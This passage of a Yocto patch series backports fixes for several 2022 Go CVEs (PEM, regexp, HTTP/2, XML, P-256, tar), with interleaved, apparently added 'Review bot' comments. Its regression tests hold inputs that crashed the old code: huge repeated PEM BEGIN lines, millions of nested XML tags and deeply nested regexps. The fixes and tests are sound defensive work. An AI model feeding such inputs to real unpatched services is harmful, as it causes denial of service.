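++ typeLine, rest = getLine(rest)
++ if !bytes.HasSuffix(typeLine, pemEndOfLine) {
++ continue
+ }
++ typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+
+- // TODO(agl): need to cope with values that spread across lines.
+- key, val := line[:i], line[i+1:]
+- key = bytes.TrimSpace(key)
+- val = bytes.TrimSpace(val)
+- p.Headers[string(key)] = string(val)
+- rest = next
+- }
++ p = &Block{
++ Headers: make(map[string]string),
++ Type: string(typeLine),
++ }
+
+- var endIndex, endTrailerIndex int
++ for {
++ // This loop terminates because getLine's second result is
++ // always smaller than its argument.
++ if len(rest) == 0 {
++ return nil, data
++ }
++ line, next := getLine(rest)
+
+- // If there were no headers, the END line might occur
+- // immediately, without a leading newline.
+- if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
+- endIndex = 0
+- endTrailerIndex = len(pemEnd) - 1
+- } else {
+- endIndex = bytes.Index(rest, pemEnd)
+- endTrailerIndex = endIndex + len(pemEnd)
+- }
++ i := bytes.IndexByte(line, ':')
++ if i == -1 {
++ break
++ }
+
+- if endIndex < 0 {
+- return decodeError(data, rest)
+- }
++ // TODO(agl): need to cope with values that spread across lines.
++ key, val := line[:i], line[i+1:]
++ key = bytes.TrimSpace(key)
++ val = bytes.TrimSpace(val)
++ p.Headers[string(key)] = string(val)
++ rest = next
++ }
+
+- // After the "-----" of the ending line, there should be the same type
+- // and then a final five dashes.
+- endTrailer := rest[endTrailerIndex:]
+- endTrailerLen := len(typeLine) + len(pemEndOfLine)
+- if len(endTrailer) < endTrailerLen {
+- return decodeError(data, rest)
+- }
++ var endIndex, endTrailerIndex int
+
+- restOfEndLine := endTrailer[endTrailerLen:]
+- endTrailer = endTrailer[:endTrailerLen]
+- if !bytes.HasPrefix(endTrailer, typeLine) ||
+- !bytes.HasSuffix(endTrailer, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
++ // If there were no headers, the END line might occur
++ // immediately, without a leading newline.
++ if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
++ endIndex = 0
++ endTrailerIndex = len(pemEnd) - 1
++ } else {
++ endIndex = bytes.Index(rest, pemEnd)
++ endTrailerIndex = endIndex + len(pemEnd)
++ }
+
+- // The line must end with only whitespace.
+- if s, _ := getLine(restOfEndLine); len(s) != 0 {
+- return decodeError(data, rest)
+- }
++ if endIndex < 0 {
++ continue
++ }
+
+- base64Data := removeSpacesAndTabs(rest[:endIndex])
+- p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
+- n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
+- if err != nil {
+- return decodeError(data, rest)
+- }
+- p.Bytes = p.Bytes[:n]
++ // After the "-----" of the ending line, there should be the same type
++ // and then a final five dashes.
++ endTrailer := rest[endTrailerIndex:]
++ endTrailerLen := len(typeLine) + len(pemEndOfLine)
++ if len(endTrailer) < endTrailerLen {
++ continue
++ }
++
++ restOfEndLine := endTrailer[endTrailerLen:]
++ endTrailer = endTrailer[:endTrailerLen]
++ if !bytes.HasPrefix(endTrailer, typeLine) ||
++ !bytes.HasSuffix(endTrailer, pemEndOfLine) {
++ continue
++ }
+
+- // the -1 is because we might have only matched pemEnd without the
+- // leading newline if the PEM block was empty.
+- _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ // The line must end with only whitespace.
++ if s, _ := getLine(restOfEndLine); len(s) != 0 {
++ continue
++ }
+
+- return
+-}
++ base64Data := removeSpacesAndTabs(rest[:endIndex])
++ p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
++ n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
++ if err != nil {
++ continue
++ }
++ p.Bytes = p.Bytes[:n]
+
+-func decodeError(data, rest []byte) (*Block, []byte) {
+- // If we get here then we have rejected a likely looking, but
+- // ultimately invalid PEM block. We need to start over from a new
+- // position. We have consumed the preamble line and will have consumed
+- // any lines which could be header lines. However, a valid preamble
+- // line is not a valid header line, therefore we cannot have consumed
+- // the preamble line for the any subsequent block. Thus, we will always
+- // find any valid block, no matter what bytes precede it.
+- //
+- // For example, if the input is
+- //
+- // -----BEGIN MALFORMED BLOCK-----
+- // junk that may look like header lines
+- // or data lines, but no END line
+- //
+- // -----BEGIN ACTUAL BLOCK-----
+- // realdata
+- // -----END ACTUAL BLOCK-----
+- //
+- // we've failed to parse using the first BEGIN line
+- // and now will try again, using the second BEGIN line.
+- p, rest := Decode(rest)
+- if p == nil {
+- rest = data
++ // the -1 is because we might have only matched pemEnd without the
++ // leading newline if the PEM block was empty.
++ _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ return p, rest
+ }
+- return p, rest
+ }
+
+ const pemLineLength = 64
+diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
+index 8515b46..4485581 100644
+--- a/src/encoding/pem/pem_test.go
++++ b/src/encoding/pem/pem_test.go
+@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
+ dGVzdA==
+ -----ENDBAR-----`
+
++const pemMissingEndLine = `
++-----BEGIN FOO-----
++Header: 1`
++
++var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
++
+ var badPEMTests = []struct {
+ name string
+ input string
+@@ -131,14 +137,34 @@ var badPEMTests = []struct {
+ "missing ending space",
+ pemMissingEndingSpace,
+ },
++ {
++ "repeating begin",
++ pemRepeatingBegin,
++ },
++ {
++ "missing end line",
++ pemMissingEndLine,
++ },
+ }
+
+ func TestBadDecode(t *testing.T) {
+ for _, test := range badPEMTests {
+- result, _ := Decode([]byte(test.input))
++ result, rest := Decode([]byte(test.input))
+ if result != nil {
+ t.Errorf("unexpected success while parsing %q", test.name)
+ }
++ if string(rest) != test.input {
++ t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
++ }
++ }
++}
++
++func TestCVE202224675(t *testing.T) {
++ // Prior to CVE-2022-24675, this input would cause a stack overflow.
++ input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
++ result, rest := Decode(input)
++ if result != nil || !reflect.DeepEqual(rest, input) {
++ t.Errorf("Encode of %#v decoded as %#v", input, rest)
+ }
+ }
+
+--
+2.25.1
+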
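Review bot: The patch header has only the CVE id as its subject and no description, so the reason for restructuring `Decode` has to be inferred from the diff. The new code retries with `continue` inside a loop and deletes `decodeError`, which re-entered `Decode` once per rejected BEGIN line; the added test comment confirms the earlier failure was a stack overflow. I would add a body line such as `encoding/pem: retry malformed blocks in a loop inside Decode instead of recursing through decodeError`. Separately, on failure `TestCVE202224675` formats two slices of roughly 120 MB each with `%#v` and says "Encode" although it exercises `Decode`; reporting `len(rest)` against `len(input)` would keep the log readable.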
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
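--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
+From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 2 Feb 2022 16:41:32 -0500
+Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
+CVE: CVE-2022-24921
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org
+
+
+The regexp code assumes it can recurse over the structure of
+a regexp safely. Go's growable stacks make that reasonable
+for all plausible regexps, but implausible ones can reach the
+“infinite recursion?” stack limit.
+
+This CL limits the depth of any parsed regexp to 1000.
+That is, the depth of the parse tree is required to be ≤ 1000.
+Regexps that require deeper parse trees will return ErrInternalError.
+A future CL will change the error to ErrInvalidDepth,
+but using ErrInternalError for now avoids introducing new API
+in point releases when this is backported.
+
+Fixes #51112.
+Fixes #51117.
+
+Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
+---
+ src/regexp/syntax/parse.go | 72 ++++++++++++++++++++++++++++++++-
+ src/regexp/syntax/parse_test.go | 7 ++++
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 8c6d43a..55bd20d 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -76,13 +76,29 @@ const (
+ opVerticalBar
+ )
+
++// maxHeight is the maximum height of a regexp parse tree.
++// It is somewhat arbitrarily chosen, but the idea is to be large enough
++// that no one will actually hit in real use but at the same time small enough
++// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
++// The maximum amount of stack for a single recursive frame is probably
++// closer to 1kB, so this could potentially be raised, but it seems unlikely
++// that people have regexps nested even this deeply.
++// We ran a test on Google's C++ code base and turned up only
++// a single use case with depth > 100; it had depth 128.
++// Using depth 1000 should be plenty of margin.
++// As an optimization, we don't even bother calculating heights
++// until we've allocated at least maxHeight Regexp structures.
++const maxHeight = 1000
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ height map[*Regexp]int // regexp height for height limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
+ *re = Regexp{}
+ } else {
+ re = new(Regexp)
++ p.numRegexp++
+ }
+ re.Op = op
+ return re
+ }
+
+ func (p *parser) reuse(re *Regexp) {
++ if p.height != nil {
++ delete(p.height, re)
++ }
+ re.Sub0[0] = p.free
+ p.free = re
+ }
+
++func (p *parser) checkHeight(re *Regexp) {
++ if p.numRegexp < maxHeight {
++ return
++ }
++ if p.height == nil {
++ p.height = make(map[*Regexp]int)
++ for _, re := range p.stack {
++ p.checkHeight(re)
++ }
++ }
++ if p.calcHeight(re, true) > maxHeight {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcHeight(re *Regexp, force bool) int {
++ if !force {
++ if h, ok := p.height[re]; ok {
++ return h
++ }
++ }
++ h := 1
++ for _, sub := range re.Sub {
++ hsub := p.calcHeight(sub, false)
++ if h < 1+hsub {
++ h = 1 + hsub
++ }
++ }
++ p.height[re] = h
++ return h
++}
++
+ // Parse stack manipulation.
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
++ p.checkHeight(re)
+ return re
+ }
+
+@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
++ p.checkHeight(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
+ // Flags, and returns a regular expression parse tree. The syntax is
+ // described in the top-level comment.
+ func Parse(s string, flags Flags) (*Regexp, error) {
++ return parse(s, flags)
++}
++
++func parse(s string, flags Flags) (_ *Regexp, err error) {
++ defer func() {
++ switch r := recover(); r {
++ default:
++ panic(r)
++ case nil:
++ // ok
++ case ErrInternalError:
++ err = &Error{Code: ErrInternalError, Expr: s}
++ }
++ }()
++
+ if flags&Literal != 0 {
+ // Trivial parser for literal string.
+ if err := checkUTF8(s); err != nil {
+@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
+ // Otherwise, must do real work.
+ var (
+ p parser
+- err error
+ c rune
+ op Op
+ lastRepeat string
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 5581ba1..1ef6d8a 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -207,6 +207,11 @@ var parseTests = []parseTest{
+ // Valid repetitions.
+ {`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
+ {`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
++
++ // Valid nesting.
++ {strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
++ {strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
++ {"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
+ }
+
+ const testFlags = MatchNL | PerlX | UnicodeGroups
+@@ -482,6 +487,8 @@ var invalidRegexps = []string{
+ `a{100000}`,
+ `a{100000,}`,
+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
+ }
+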
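Review bot: The `Signed-off-by` trailer in the patch header is missing its closing `>` (`<ralph.siemsen@linaro.org`), which can trip tooling that parses trailers; it should read `Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>`. In the Go change itself, `checkHeight` reports an over-deep tree with `panic(ErrInternalError)` and relies on the deferred `recover` in `parse` to turn that into an error, but neither function says so. A short comment on `checkHeight`, for example `// checkHeight panics with ErrInternalError if re is taller than maxHeight; parse recovers it.`, would make that contract explicit for the next backport touching this file.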
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
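--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
+From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 29 Sep 2022 17:06:18 +0530
+Subject: [PATCH] CVE-2022-27664
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
+CVE: CVE-2022-27664
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/h2_bundle.go | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 65d851d..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -3254,10 +3254,11 @@ var (
+ // name (key). See httpguts.ValidHeaderName for the base rules.
+ //
+ // Further, http2 says:
+-// "Just as in HTTP/1.x, header field names are strings of ASCII
+-// characters that are compared in a case-insensitive
+-// fashion. However, header field names MUST be converted to
+-// lowercase prior to their encoding in HTTP/2. "
++//
++// "Just as in HTTP/1.x, header field names are strings of ASCII
++// characters that are compared in a case-insensitive
++// fashion. However, header field names MUST be converted to
++// lowercase prior to their encoding in HTTP/2. "
+ func http2validWireHeaderFieldName(v string) bool {
+ if len(v) == 0 {
+ return false
+@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
+ // validPseudoPath reports whether v is a valid :path pseudo-header
+ // value. It must be either:
+ //
+-// *) a non-empty string starting with '/'
+-// *) the string '*', for OPTIONS requests.
++// *) a non-empty string starting with '/'
++// *) the string '*', for OPTIONS requests.
+ //
+ // For now this is only used a quick check for deciding when to clean
+ // up Opaque URLs before sending requests from the Transport.
+@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
+ func (sc *http2serverConn) goAway(code http2ErrCode) {
+ sc.serveG.check()
+ if sc.inGoAway {
++ if sc.goAwayCode == http2ErrCodeNo {
++ sc.goAwayCode = code
++ }
+ return
+ }
+ sc.inGoAway = true
+@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
+ // prior to the headers being written. If the set of trailers is fixed
+ // or known before the header is written, the normal Go trailers mechanism
+ // is preferred:
+-// https://golang.org/pkg/net/http/#ResponseWriter
+-// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
++//
++// https://golang.org/pkg/net/http/#ResponseWriter
++// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
+ const http2TrailerPrefix = "Trailer:"
+
+ // promoteUndeclaredTrailers permits http.Handlers to set trailers
+--
+2.25.1
+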
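Review bot: Only the three lines added to `goAway` change behaviour; the other three hunks just re-indent the comments on `http2validWireHeaderFieldName`, `validPseudoPath` and `http2TrailerPrefix`. Carrying that formatting churn in a CVE backport widens the context the patch must match, so it is more likely to conflict with any other patch the recipe applies to `h2_bundle.go`. I would drop the comment-only hunks and give the header, which currently holds only the CVE id, a description such as `net/http: in goAway, keep the new error code when a GOAWAY is already in progress with http2ErrCodeNo`. The body of `goAway` continues outside the hunk.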
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
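--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
+From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Mon, 28 Mar 2022 18:41:26 -0700
+Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
+CVE: CVE-2022-28131
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Prevents exhausting the stack limit in _incredibly_ deeply nested
+structures.
+
+Fixes #53711
+Updates #53614
+Fixes CVE-2022-28131
+
+Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+---
+ src/encoding/xml/read.go | 15 ++++++++-------
+ src/encoding/xml/read_test.go | 18 ++++++++++++++++++
+ 2 files changed, 26 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 4ffed80..3fac859 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -743,12 +743,12 @@ Loop:
+ }
+
+ // Skip reads tokens until it has consumed the end element
+-// matching the most recent start element already consumed.
+-// It recurs if it encounters a start element, so it can be used to
+-// skip nested structures.
++// matching the most recent start element already consumed,
++// skipping nested structures.
+ // It returns nil if it finds an end element matching the start
+ // element; otherwise it returns an error describing the problem.
+ func (d *Decoder) Skip() error {
++ var depth int64
+ for {
+ tok, err := d.Token()
+ if err != nil {
+@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
+ }
+ switch tok.(type) {
+ case StartElement:
+- if err := d.Skip(); err != nil {
+- return err
+- }
++ depth++
+ case EndElement:
+- return nil
++ if depth == 0 {
++ return nil
++ }
++ depth--
+ }
+ }
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 6a20b1a..7a621a5 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,9 +5,11 @@
+ package xml
+
+ import (
++ "bytes"
+ "errors"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ "time"
+@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
+ }
+ }
++
++func TestCVE202230633(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes memory exhaustion on js/wasm")
++ }
++ defer func() {
++ p := recover()
++ if p != nil {
++ t.Fatal("Unmarshal panicked")
++ }
++ }()
++ var example struct {
++ Things []string
++ }
++ Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
++}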
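Review bot: The last `read_test.go` hunk applies only to a tree that already contains `TestCVE202228131` and `errExeceededMaxUnmarshalDepth`, which appear as context but are not added here, so this patch presumably depends on another patch in the series being applied first. That ordering should be stated in the patch header or checked against the recipe's `SRC_URI`, otherwise the hunk will fail to apply. The added test is also named `TestCVE202230633` while the header declares CVE-2022-28131. A one-line comment such as `// Deeply nested input must not panic; accompanies the iterative Decoder.Skip change.` would save readers from chasing the mismatch.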
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
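--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
+From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 31 Mar 2022 12:31:58 -0400
+Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
+ P-256
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
+CVE: CVE-2022-28327
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Updates #52075
+Fixes #52076
+Fixes CVE-2022-28327
+
+Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Julie Qiu <julie@golang.org>
+---
+ src/crypto/elliptic/p256.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
+index c23e414..787e3e7 100644
+--- a/src/crypto/elliptic/p256.go
++++ b/src/crypto/elliptic/p256.go
+@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
+ n := new(big.Int).SetBytes(in)
+ var scalarBytes []byte
+
+- if n.Cmp(p256Params.N) >= 0 {
++ if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
+ n.Mod(n, p256Params.N)
+ scalarBytes = n.Bytes()
+ } else {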
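Review bot: The widened condition in `p256GetScalar` has no comment explaining why an input longer than `out` must take the `Mod` branch even when its value is below N, and the patch adds no test for a zero-padded scalar. I would add `// Also reduce over-long (zero-padded) inputs: n.Bytes() drops the leading zeros so the result fits in out.` above the `if`. The `else` branch and the copy into `out` lie outside the hunk, so whether the unreduced path can overrun the 32-byte `out` cannot be confirmed from here, though the subject line suggests it. A regression test passing a scalar with leading zero bytes and a total length above 32 would pin the fix.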
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
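--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
+From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 2 Sep 2022 20:45:18 -0700
+Subject: [PATCH] archive/tar: limit size of headers
+
+Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
+GNU link names), to avoid reading arbitrarily large amounts of data
+into memory.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
+this issue.
+
+Fixes CVE-2022-2879
+Updates #54853
+Fixes #55926
+
+Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
+CVE: CVE-2022-2879
+Signed-off-by: Sunil Kumar <sukumar@mvista.com>
+---
+ src/archive/tar/format.go | 4 ++++
+ src/archive/tar/reader.go | 14 ++++++++++++--
+ src/archive/tar/writer.go | 3 +++
+ 3 files changed, 19 insertions(+), 2 deletions(-)
+
+diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
+index cfe24a5..6642364 100644
+--- a/src/archive/tar/format.go
++++ b/src/archive/tar/format.go
+@@ -143,6 +143,10 @@ const (
+ blockSize = 512 // Size of each block in a tar stream
+ nameSize = 100 // Max length of the name field in USTAR format
+ prefixSize = 155 // Max length of the prefix field in USTAR format
++
++ // Max length of a special file (PAX header, GNU long name or link).
++ // This matches the limit used by libarchive.
++ maxSpecialFileSize = 1 << 20
+ )
+
+ // blockPadding computes the number of bytes needed to pad offset up to the
+diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
+index 4f9135b..e996595 100644
+--- a/src/archive/tar/reader.go
++++ b/src/archive/tar/reader.go
+@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
+ continue // This is a meta header affecting the next header
+ case TypeGNULongName, TypeGNULongLink:
+ format.mayOnlyBe(FormatGNU)
+- realname, err := ioutil.ReadAll(tr)
++ realname, err := readSpecialFile(tr)
+ if err != nil {
+ return nil, err
+ }
+@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
+ // parsePAX parses PAX headers.
+ // If an extended header (type 'x') is invalid, ErrHeader is returned
+ func parsePAX(r io.Reader) (map[string]string, error) {
+- buf, err := ioutil.ReadAll(r)
++ buf, err := readSpecialFile(r)
+ if err != nil {
+ return nil, err
+ }
+@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
+ return n, err
+ }
+
++// readSpecialFile is like ioutil.ReadAll except it returns
++// ErrFieldTooLong if more than maxSpecialFileSize is read.
++func readSpecialFile(r io.Reader) ([]byte, error) {
++ buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
++ if len(buf) > maxSpecialFileSize {
++ return nil, ErrFieldTooLong
++ }
++ return buf, err
++}
++
+ // discard skips n bytes in r, reporting an error if unable to do so.
+ func discard(r io.Reader, n int64) error {
+ // If possible, Seek to the last byte before the end of the data section.
+diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
+index e80498d..893eac0 100644
+--- a/src/archive/tar/writer.go
++++ b/src/archive/tar/writer.go
+@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
+ flag = TypeXHeader
+ }
+ data := buf.String()
++ if len(data) > maxSpecialFileSize {
++ return ErrFieldTooLong
++ }
+ if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
+ return err // Global headers return here
+ }
+--
+2.7.4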
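Review bot: `readSpecialFile` reads `maxSpecialFileSize+1` bytes without saying why, and that extra byte is what makes the limit check work. A comment such as `// Read one byte past the limit so an entry of exactly maxSpecialFileSize is accepted and anything longer is detected.` would document it. When the limit is exceeded, the error from `ioutil.ReadAll` is discarded in favour of `ErrFieldTooLong`; that looks intentional but is worth stating in the function comment so callers know which error wins.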
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
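--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
+From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 12:22:41 +0530
+Subject: [PATCH] CVE-2022-2880
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
+CVE: CVE-2022-2880
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http/httputil: avoid query parameter
+
+Query parameter smuggling occurs when a proxy's interpretation
+of query parameters differs from that of a downstream server.
+Change ReverseProxy to avoid forwarding ignored query parameters.
+
+Remove unparsable query parameters from the outbound request
+
+ * if req.Form != nil after calling ReverseProxy.Director; and
+ * before calling ReverseProxy.Rewrite.
+
+This change preserves the existing behavior of forwarding the
+raw query untouched if a Director hook does not parse the query
+by calling Request.ParseForm (possibly indirectly).
+---
+ src/net/http/httputil/reverseproxy.go | 36 +++++++++++
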